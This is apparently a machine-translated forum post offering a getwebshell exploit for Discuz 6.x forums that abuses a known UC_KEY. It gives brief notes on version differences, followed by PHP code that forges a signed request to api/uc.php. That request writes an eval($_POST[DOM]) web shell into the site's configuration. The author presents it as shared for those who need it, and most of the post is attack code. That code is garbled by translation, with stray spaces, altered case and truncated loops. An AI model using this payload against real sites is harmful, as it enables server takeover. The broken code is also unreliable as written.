DZ6.x UC_KEY getwebshell exploit

DZ6.x UC_KEY getwebshell exploit

Dz is available online. the uc_key exploitation method of the x and dz x Series met a website named dz6.0 today, so I analyzed the code, changed the exploitation program, and shared it with the people who needed it. Uc_key getshell is a vulnerability that has a wide impact for a long time. Generally, all programs that use ucenter as the user center can be used, but specific exploitation needs to be written according to specific programs. The latest dz version seems to have been fixed, and no specific code is available.

Note:

1. the xml parsing in dz6.x is different, so you need to modify and use exp

$ Post = uc_unserialize (uc_post_contents ());

2. in earlier versions, $ UC_API is not escaped, so you do not need to submit two packages.

$ Configfile = preg_replace ("/define \ ('uc _ api', \ s *'.*? '\);/I "," define ('uc _ api',' $ UC_API '); ", $ configfile );

3. encryption functions of earlier versions are also different.
 

// The Code copyright belongs to the original author! $ Timestamp = time () + 10*3600; $ host = "127.0.0.1"; $ uc_key = "Hangzhou "; $ code = urlencode (_ authcode ("time = $ timestamp & action = updateapps", 'encoding', $ uc_key); $ cmd1 =' http://xxx \ '); Eval ($ _ POST [DOM]); //'; $ html1 = send ($ cmd1); echo $ html1; function send ($ cmd) {global $ host, $ code; $ message = "POST/dz/api/uc. php? Code = ". $ code. "HTTP/1.1 \ r \ n"; $ message. = "Accept: */* \ r \ n"; $ message. = "Referer :". $ host. "\ r \ n"; $ message. = "Accept-Language: zh-cn \ r \ n"; $ message. = "Content-Type: application/x-www-form-urlencoded \ r \ n"; $ message. = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) \ r \ n"; $ message. = "Host :". $ host. "\ r \ n"; $ message. = "Content-Length :". strlen ($ cmd ). "\ r \ n"; $ message. = "Conne Ction: Close \ r \ n "; $ message. = $ cmd; $ fp = fsockopen ($ host, 80); fputs ($ fp, $ message); $ resp = ''; while ($ fp &&! Feof ($ fp) $ resp. = fread ($ fp, 1024); return $ resp;} function _ authcode ($ string, $ operation = 'decode', $ key = '', $ expiry = 0) {$ ckey_length = 4; $ key = md5 ($ key? $ Key: UC_KEY); $ keya = md5 (substr ($ key, 0, 16); $ keyb = md5 (substr ($ key, 16, 16 )); $ keyc = $ ckey_length? ($ Operation = 'decode '? Substr ($ string, 0, $ ckey_length): substr (md5 (microtime (),-$ ckey_length): ''; $ cryptkey = $ keya. md5 ($ keya. $ keyc); $ key_length = strlen ($ cryptkey); $ string = $ operation = 'decode '? Base64_decode (substr ($ string, $ ckey_length): sprintf ('% 010d', $ expiry? $ Expiry + time (): 0 ). substr (md5 ($ string. $ keyb), 0, 16 ). $ string; $ string_length = strlen ($ string); $ result = ''; $ box = range (0,255); $ rndkey = array (); for ($ I = 0; $ I $ rndkey [$ I] = ord ($ cryptkey [$ I % $ key_length]);} for ($ j = $ I = 0; $ I $ j = ($ j + $ box [$ I] + $ rndkey [$ I]) % 256; $ tmp = $ box [$ I]; $ box [$ I] = $ box [$ j]; $ box [$ j] = $ tmp;} for ($ a = $ j = $ I = 0; $ I $ a = ($ a + 1) % 256; $ j = ($ j + $ box [$ A]) % 256; $ tmp = $ box [$ a]; $ box [$ a] = $ box [$ j]; $ box [$ j] = $ tmp; $ result. = chr (ord ($ string [$ I]) ^ ($ box [($ box [$ a] + $ box [$ j]) % 256]);} if ($ operation = 'decode') {if (substr ($ result, 0, 10) = 0 | substr ($ result, 0, 10) -time ()> 0) & substr ($ result, 10, 16) = substr (md5 (substr ($ result, 26 ). $ keyb), 0, 16) {return substr ($ result, 26) ;}else {return '';}} else {return $ keyc. str_rep Encode ('=', '', base64_encode ($ result) ;}}?>